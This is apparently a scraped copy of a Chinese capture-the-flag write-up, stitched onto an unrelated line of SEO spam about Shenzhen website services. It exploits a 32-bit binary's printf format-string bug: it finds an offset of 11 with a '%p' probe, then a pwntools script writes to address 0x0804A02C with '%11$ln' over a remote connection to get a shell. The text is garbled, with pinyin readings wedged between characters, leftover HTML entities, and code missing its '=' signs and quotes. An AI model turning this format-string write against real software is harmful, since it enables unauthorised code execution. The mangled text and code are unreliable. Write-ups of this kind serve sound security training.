深圳網(wǎng)站優(yōu)化方式,免費(fèi)網(wǎng)頁(yè)申請(qǐng)注冊(cè),做各國(guó)民宿租賃的網(wǎng)站,網(wǎng)站建設(shè)怎么做更好首先checksec檢查保護(hù)機(jī)制#xff1a;-32位程序-開(kāi)啟了棧溢出保護(hù)和棧不可執(zhí)行保護(hù)接下來(lái)使用反匯編工具IDA進(jìn)行分析#xff1a;發(fā)現(xiàn)沒(méi)有后門(mén)函數(shù)#xff0c;不過(guò)有printf函數(shù)#xff0c;可觸發(fā)格式化字符串漏洞#xff0c;再看下面#xff0c;只要讓x的值等于4#xff…首先checksec檢查保護(hù)機(jī)制-32位程序-開(kāi)啟了棧溢出保護(hù)和棧不可執(zhí)行保護(hù)接下來(lái)使用反匯編工具IDA進(jìn)行分析發(fā)現(xiàn)沒(méi)有后門(mén)函數(shù)不過(guò)有printf函數(shù)可觸發(fā)格式化字符串漏洞再看下面只要讓x的值等于4即可拿到shell那么方向就很明顯了使用格式化字符串漏洞實(shí)現(xiàn)任意地址寫(xiě)將x的值改寫(xiě)為4接下來(lái)先找到第一個(gè)參數(shù)的偏移方便利用格式化字符串漏洞在pwndbg中動(dòng)態(tài)調(diào)試先對(duì)程序輸入一下代碼AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p得到發(fā)現(xiàn)0x41414141這個(gè)參數(shù)在第11位0x41414141以ASCII碼轉(zhuǎn)化為字符即為AAAA也就是我們輸入的AAAA在第11位處即偏移為11再在IDA中拿到x的地址0x0804A02C然后就是腳本的編寫(xiě)了from pwn import * context(archi386, oslinux, log_leveldebug) #io process(./pwn) # 在本地運(yùn)行程序。 # gdb.attach(io) # 啟動(dòng) GDB io connect(node5.buuoj.cn,25207) # 與在線(xiàn)環(huán)境交互。 offset 11 aim_addr 0x0804A02C payload p32(aim_addr) b%11$ln io.sendline(payload) io.interactive()這是運(yùn)行結(jié)果拿到shell后輸入cat flag即可拿到flag